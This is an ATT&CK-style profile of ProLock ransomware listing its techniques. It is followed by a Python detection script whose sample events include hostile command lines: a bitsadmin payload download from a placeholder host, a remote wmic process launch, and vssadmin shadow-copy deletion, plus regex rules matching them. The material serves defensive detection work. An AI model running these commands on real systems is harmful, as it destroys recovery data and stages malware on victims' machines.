ProLock

ProLock is a ransomware strain that has been used in Big Game Hunting (BGH) operations since at least 2020, often obtaining initial access with QakBot. ProLock is the successor to PwndLocker ransomware, which was found in 2019 to contain a bug allowing decryption without ransom payment.[1]

ID: S0654
Type: MALWARE
Platforms: Windows
Version: 1.0
Created: 30 September 2021
Last Modified: 15 October 2021

Techniques Used

Domain ID Name Use
Enterprise T1197 BITS Jobs

ProLock can use BITS jobs to download its malicious payload.[1]

Enterprise T1047 Windows Management Instrumentation

ProLock can use WMIC to execute scripts on targeted hosts.[1]

Enterprise T1486 Data Encrypted for Impact

ProLock can encrypt files on a compromised host with RC6 and encrypt the RC6 key with RSA-1024.[1]

Enterprise T1068 Exploitation for Privilege Escalation

ProLock can use CVE-2019-0859 to escalate privileges on a compromised host.[1]

Enterprise T1027 .003 Obfuscated Files or Information: Steganography

ProLock can use .jpg and .bmp files to store its payload.[1]

Enterprise T1070 .004 Indicator Removal: File Deletion

ProLock can remove files containing its payload after they are executed.[1]

Enterprise T1490 Inhibit System Recovery

ProLock can use vssadmin.exe to remove volume shadow copies.[1]
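Detection logic for three of the command-line behaviours listed above (BITS jobs, WMIC process execution, vssadmin shadow-copy deletion), as an added example that is not part of the ATT&CK entry. The process-creation events are constructed, and the assumption that the BITS job is created with bitsadmin.exe is mine; the entry only says "BITS jobs".

```python
import re

# Constructed process-creation events (not real ProLock telemetry); each
# mirrors one command-line behaviour the entry attributes to ProLock.
SAMPLE_EVENTS = [
    {"host": "ws01", "cmdline": "bitsadmin.exe /transfer upd /download /priority high "
                                "http://example.invalid/pic.jpg C:\\Users\\Public\\pic.jpg"},
    {"host": "ws01", "cmdline": 'wmic /node:ws02 process call create "cscript C:\\Users\\Public\\run.vbs"'},
    {"host": "ws02", "cmdline": "vssadmin.exe delete shadows /all /quiet"},
    {"host": "ws02", "cmdline": "vssadmin.exe list shadows"},  # benign: must not match
]

# (technique ID, technique name, pattern). The bitsadmin rule is an assumption:
# the entry says "BITS jobs" without naming the tool used to create them.
RULES = [
    ("T1197", "BITS Jobs",
     re.compile(r"\bbitsadmin(?:\.exe)?\b.*/(?:transfer|addfile|resume)\b", re.I)),
    ("T1047", "Windows Management Instrumentation",
     re.compile(r"\bwmic(?:\.exe)?\b.*\bprocess\s+call\s+create\b", re.I)),
    ("T1490", "Inhibit System Recovery",
     re.compile(r"\bvssadmin(?:\.exe)?\b.*\bdelete\s+shadows\b", re.I)),
]


def classify(cmdline):
    """Return the ATT&CK technique IDs whose rule matches this command line."""
    return [tid for tid, _name, pat in RULES if pat.search(cmdline)]


def scan(events):
    """Return one finding per (event, technique) pair, preserving event order."""
    findings = []
    for ev in events:
        for tid in classify(ev["cmdline"]):
            findings.append({"host": ev["host"], "technique": tid, "cmdline": ev["cmdline"]})
    return findings


if __name__ == "__main__":
    for f in scan(SAMPLE_EVENTS):
        print(f"{f['host']}: {f['technique']} <- {f['cmdline']}")
```

Feeding real process-creation telemetry (for example Sysmon Event ID 1 command lines) through scan() gives a first triage pass; the vssadmin rule in particular is high-confidence on workstations, where shadow-copy deletion has little legitimate use.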

References